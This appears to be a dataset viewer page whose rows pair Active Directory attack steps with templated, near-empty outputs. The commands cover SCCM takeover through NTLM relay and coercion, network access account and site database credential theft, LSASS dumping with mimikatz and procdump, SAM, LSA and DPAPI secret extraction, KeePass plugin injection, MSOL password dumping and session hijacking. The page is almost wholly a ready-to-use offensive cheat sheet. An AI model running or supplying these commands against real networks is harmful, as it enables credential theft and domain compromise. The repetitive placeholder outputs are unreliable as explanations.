instruction stringclasses 270
values | input stringlengths 3 214 | output stringclasses 297
values |
|---|---|---|
CRED-6 Loot creds | SCCM HTTP service (80/TCP or 443/TCP) on a DP | Note or procedural step under 'CRED-6 Loot creds'. |
CRED-6 Loot creds | SCCMSecrets.py policies -mp http://<management_point> -u '<machine_account>$' -p '<machine_password>' -cn '<client_name>' | Note or procedural step under 'CRED-6 Loot creds'. |
CRED-6 Loot creds | SCCMSecrets.py files -dp http://<distribution_point> -u '<user>' -p '<password>' | Note or procedural step under 'CRED-6 Loot creds'. |
CRED-6 Loot creds | sccm-http-looter -server <ip_dp> | Note or procedural step under 'CRED-6 Loot creds'. |
Takeover-1:relay to mssql db Simple user | SCCM MSSQL != SSCM server | Note or procedural step under 'Takeover-1:relay to mssql db Simple user'. |
Takeover-1:relay to mssql db Simple user | sccmhunter.py mssql -u <user> -p <password> -d <domain> -dc-ip <dc_ip> -debug -tu <target_user> -sc <site_code> -stacked | Note or procedural step under 'Takeover-1:relay to mssql db Simple user'. |
Takeover-1:relay to mssql db Simple user | ntlmrelayx.py -smb2support -ts -t mssql://<sccm_mssql> -q "<query>" | Note or procedural step under 'Takeover-1:relay to mssql db Simple user'. |
Takeover-1:relay to mssql db Simple user | coerce sccm_mssql -> attacker | Note or procedural step under 'Takeover-1:relay to mssql db Simple user'. |
Takeover-1:relay to mssql db Simple user | sccmhunter.py admin -u <target_user>@<domain> -p '<password>' -ip <sccm_ip> #SCCM ADMIN | Note or procedural step under 'Takeover-1:relay to mssql db Simple user'. |
Takeover-2:relay to mssql server Simple user | SCCM MSSQL != SSCM server | Note or procedural step under 'Takeover-2:relay to mssql server Simple user'. |
Takeover-2:relay to mssql server Simple user | ntlmrelayx.py -t <sccm_mssql> -smb2support -socks | Note or procedural step under 'Takeover-2:relay to mssql server Simple user'. |
Takeover-2:relay to mssql server Simple user | coerce sccm_server | Note or procedural step under 'Takeover-2:relay to mssql server Simple user'. |
Takeover-2:relay to mssql server Simple user | proxychains smbexec.py -no-pass <domain>/'<sccm_server>$'@<sccm_ip> #Admin MSSQL | Note or procedural step under 'Takeover-2:relay to mssql server Simple user'. |
Creds-2:Policy Request Credentials Simple user | add computer | Note or procedural step under 'Creds-2:Policy Request Credentials Simple user'. |
Creds-2:Policy Request Credentials Simple user | sccmwtf.py newcomputer newcomputer.<domain> <target> '<domain>\<computer_added>$' '<computer_pass>' | Note or procedural step under 'Creds-2:Policy Request Credentials Simple user'. |
Creds-2:Policy Request Credentials Simple user | get NetworkAccessUsername and NetworkAccessPassword | Note or procedural step under 'Creds-2:Policy Request Credentials Simple user'. |
Creds-2:Policy Request Credentials Simple user | policysecretunobfuscate.py | Note or procedural step under 'Creds-2:Policy Request Credentials Simple user'. |
Creds-2:Policy Request Credentials Simple user | delete device created after sccmadmin #User + Pass | Note or procedural step under 'Creds-2:Policy Request Credentials Simple user'. |
Creds-2:Policy Request Credentials Simple user | SharpSCCM.exe get secrets -r newcomputer -u <computer_added>$ -p <computer_pass>" | Note or procedural step under 'Creds-2:Policy Request Credentials Simple user'. |
Creds-2:Policy Request Credentials Simple user | cleanup #User + Pass | Note or procedural step under 'Creds-2:Policy Request Credentials Simple user'. |
Creds-3Creds-4 Computer Admin user | dploot.py sccm -u <admin> -p '<password>' <sccm_target> #NAA credentials | Note or procedural step under 'Creds-3Creds-4 Computer Admin user'. |
Creds-3Creds-4 Computer Admin user | sccmhunter.py dpapi -u <admin> -p '<password>' -target <sccm_target> -debug #NAA credentials | Note or procedural step under 'Creds-3Creds-4 Computer Admin user'. |
Creds-3Creds-4 Computer Admin user | SharpSCCM.exe local secrets -m disk #NAA credentials | Note or procedural step under 'Creds-3Creds-4 Computer Admin user'. |
Creds-3Creds-4 Computer Admin user | SharpSCCM.exe local secrets -m wmi #NAA credentials | Note or procedural step under 'Creds-3Creds-4 Computer Admin user'. |
Creds-5 SCCM admin | secretsdump.py <domain>/<admin>:'<pass>'@<sccm_target> | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Creds-5 SCCM admin | mssqlclient.py -windows-auth -hashes '<sccm_target_hashNT>' '<domain>/<sccm_target>$'@<sccm_mssql> | Note or procedural step under 'Creds-5 SCCM admin'. |
Creds-5 SCCM admin | use CM_<site_code>; | Note or procedural step under 'Creds-5 SCCM admin'. |
Creds-5 SCCM admin | SELECT * FROM SC_UserAccount; | Note or procedural step under 'Creds-5 SCCM admin'. |
Creds-5 SCCM admin | sccmdecryptpoc.exe <cyphered_value> #Site DB credentials | Note or procedural step under 'Creds-5 SCCM admin'. |
Creds-5 SCCM admin | get_device <hostname> | Note or procedural step under 'Creds-5 SCCM admin'. |
Creds-5 SCCM admin | interact <device_id> | Note or procedural step under 'Creds-5 SCCM admin'. |
Creds-5 SCCM admin | script xploit.ps1 #Site DB credentials | Note or procedural step under 'Creds-5 SCCM admin'. |
Creds-5 SCCM admin | EXEC-1/2 SCCM admin | Note or procedural step under 'Creds-5 SCCM admin'. |
Creds-5 SCCM admin | SharpSCCM.exe exec -p <binary> -d <device_name> -sms <SMS_PROVIDER> -sc <SITECODE> --no-banner #lat | Note or procedural step under 'Creds-5 SCCM admin'. |
Creds-5 SCCM admin | sccmhunter.py admin -u <user>@<domain> -p '<password>' -ip <sccm_ip> #lat | Note or procedural step under 'Creds-5 SCCM admin'. |
Cleanup | SharpSCCM.exe get devices -sms <SMS_PROVIDER> -sc <SITECODE> -n <NTLMRELAYX_LISTENER_IP> -p "Name" -p "ResourceId" -p "SMSUniqueIdentifier" | Note or procedural step under 'Cleanup'. |
Cleanup | SharpSCCM.exe remove device GUID:<GUID> -sms <SMS_PROVIDER> -sc <SITECODE> | Note or procedural step under 'Cleanup'. |
Post exploit | as sccm admin | Note or procedural step under 'Post exploit'. |
Post exploit | SCCMHound.exe --server <server> --sitecode <sitecode> | Note or procedural step under 'Post exploit'. |
Post exploit | Users sessions | Note or procedural step under 'Post exploit'. |
Admin access | Extract credentials from LSASS.exe | Note or procedural step under 'Admin access'. |
Admin access | LSASS as protected process | Note or procedural step under 'Admin access'. |
Admin access | PPLdump64.exe <lsass.exe|lsass_pid> lsass.dmp #before 2022-07-22 update | Note or procedural step under 'Admin access'. |
Admin access | mimikatz "!+" "!processprotect /process:lsass.exe /remove" "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "!processprotect /process:lsass.exe" "!-" | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Admin access | Extract LSASS secrets | Note or procedural step under 'Admin access'. |
Admin access | procdump.exe -accepteula -ma lsass.exe lsass.dmp | Note or procedural step under 'Admin access'. |
Admin access | mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "exit" | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Admin access | msf> load kiwi creds_all | Tool or command referenced under 'Admin access'. |
Admin access | nxc smb <ip_range> -u <user> -p <password> -M lsassy | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Admin access | lsassy -d <domain> -u <user> -p <password> <ip> | Note or procedural step under 'Admin access'. |
Extract credentials from SAM | nxc smb <ip_range> -u <user> -p <password> --sam | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Extract credentials from SAM | msf> hashdump | Tool or command referenced under 'Extract credentials from SAM'. |
Extract credentials from SAM | mimikatz "privilege::debug" "lsadump::sam" "exit" | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Extract credentials from SAM | secretsdump.py <domain>/<user>:<password>@<ip> | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Extract credentials from SAM | reg save HKLM\SAM <file>; reg save HKLM\SYSTEM <file> | Note or procedural step under 'Extract credentials from SAM'. |
Extract credentials from SAM | secretsdump.py -system SYSTEM -sam SAM LOCAL | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Extract credentials from SAM | reg.py <domain>/<user>:<password>@<ip> backup -o '\\<smb_ip>\share' | Note or procedural step under 'Extract credentials from SAM'. |
Extract credentials from SAM | secretsdump.py -system SYSTEM -sam SAM LOCAL | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Extract credentials from SAM | regsecrets.py <domain>/<user>:<password>@<ip> | Note or procedural step under 'Extract credentials from SAM'. |
Extract credentials from LSA | nxc smb <ip_range> -u <user> -p <password> --lsa | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Extract credentials from LSA | mimikatz "privilege::debug" "lsadump::lsa" "exit" | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Extract credentials from LSA | reg save HKLM\SECURITY <file>; reg save HKLM\SYSTEM <file> | Note or procedural step under 'Extract credentials from LSA'. |
Extract credentials from LSA | secretsdump.py -system SYSTEM -security SECURITY | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Extract credentials from LSA | reg.py <domain>/<user>:<password>@<ip> backup -o '\\<smb_ip>\share' | Note or procedural step under 'Extract credentials from LSA'. |
Extract credentials from DPAPI | DPAPI | Note or procedural step under 'Extract credentials from DPAPI'. |
Extract credentials from DPAPI | nxc smb <ip_range> -u <user> -p <password> --dpapi [cookies] [nosystem] | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Extract credentials from DPAPI | donpapi <domain>/<user>:<password>@<target> | Note or procedural step under 'Extract credentials from DPAPI'. |
Extract credentials from DPAPI | dpapidump.py <domain>/<user>:<password>@<target> | Note or procedural step under 'Extract credentials from DPAPI'. |
Extract credentials from DPAPI | get masterkey | Note or procedural step under 'Extract credentials from DPAPI'. |
Extract credentials from DPAPI | mimikatz "sekurlsa::dpapi" | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Extract credentials from DPAPI | dploot.py browser -d <domain> -u <user> -p '<password>' <ip> -mkfile <masterkeys_file> | Note or procedural step under 'Extract credentials from DPAPI'. |
Extract credentials from DPAPI | lsassy -d <domain> -u <user> -p <password> <ip> -m rdrleakdiag -M masterkeys | Note or procedural step under 'Extract credentials from DPAPI'. |
Extract credentials from DPAPI | dploot.py browser -d <domain> -u <user> -p '<password>' <ip> -mkfile <masterkeys_file> | Note or procedural step under 'Extract credentials from DPAPI'. |
Extract credentials from DPAPI | SharpDPAPI.exe triage | Note or procedural step under 'Extract credentials from DPAPI'. |
Extract credentials from DPAPI | Crack users masterkey | Note or procedural step under 'Extract credentials from DPAPI'. |
Extract credentials from DPAPI | copy c:\users\<user>\AppData\Roaming\Microsoft\Protect\<SID> | Note or procedural step under 'Extract credentials from DPAPI'. |
Extract credentials from DPAPI | DPAPImk2john.py --preferred <prefered_file> | Tool or command referenced under 'Extract credentials from DPAPI'. |
Extract credentials from DPAPI | DPAPImk2john.py -c domain -mk <masterkey> -S <sid> #DPAPImk | Tool or command referenced under 'Extract credentials from DPAPI'. |
Impersonate | Impersonate | Note or procedural step under 'Impersonate'. |
Impersonate | msf> use incognito impersonate_token <domain>\\<user> | Tool or command referenced under 'Impersonate'. |
Impersonate | nxc smb <ip> -u <localAdmin> -p <password> --loggedon-users | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Impersonate | nxc smb <ip> -u <localAdmin> -p <password> -M schtask_as -o USER=<logged-on-user> CMD=<cmd-command> | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Impersonate | irs.exe list | Note or procedural step under 'Impersonate'. |
Impersonate | irs.exe exec -p <pid> -c <command> | Note or procedural step under 'Impersonate'. |
Impersonate | Impersonate with adcs | Note or procedural step under 'Impersonate'. |
Impersonate | masky - d <domain> -u <user> (-p <password> || -k || -H <hash>) -ca <certificate authority> <ip> | Note or procedural step under 'Impersonate'. |
Impersonate | Impersonate RDP Session | Note or procedural step under 'Impersonate'. |
Impersonate | psexec.exe -s -i cmd | Note or procedural step under 'Impersonate'. |
Impersonate | query user | Note or procedural step under 'Impersonate'. |
Impersonate | tscon.exe <id> /dest:<session_name> #RDP | Note or procedural step under 'Impersonate'. |
Misc | Find Users | Note or procedural step under 'Misc'. |
Misc | smbmap.py --host-file ./computers.list -u <user> -p <password> -d <domain> -r 'C$\Users' --dir-only --no-write-check --no-update --no-color --csv users_directory.csv | Note or procedural step under 'Misc'. |
Misc | Extract Keepass | Note or procedural step under 'Misc'. |
Misc | KeePwn.py plugin add -u '<user>' -p '<password>' -d '<domain>' -t <target> --plugin KeeFarceRebornPlugin.dll | Note or procedural step under 'Misc'. |
Misc | KeePwn.py trigger add -u '<user>' -p '<password>' -d '<domain>' -t <target> | Note or procedural step under 'Misc'. |
Misc | Hybrid (Azure AD-Connect) | Note or procedural step under 'Misc'. |
Misc | Dump cleartext password of MSOL Account on ADConnect Server | Note or procedural step under 'Misc'. |
Misc | azuread_decrypt_msol_v2.ps1 #DCSYNC | Note or procedural step under 'Misc'. |
Misc | nxc smb <ip> -u <user> -p <password> -M msol #DCSYNC | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Clear text Password | Interactive-shell - psexec | Note or procedural step under 'Clear text Password'. |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.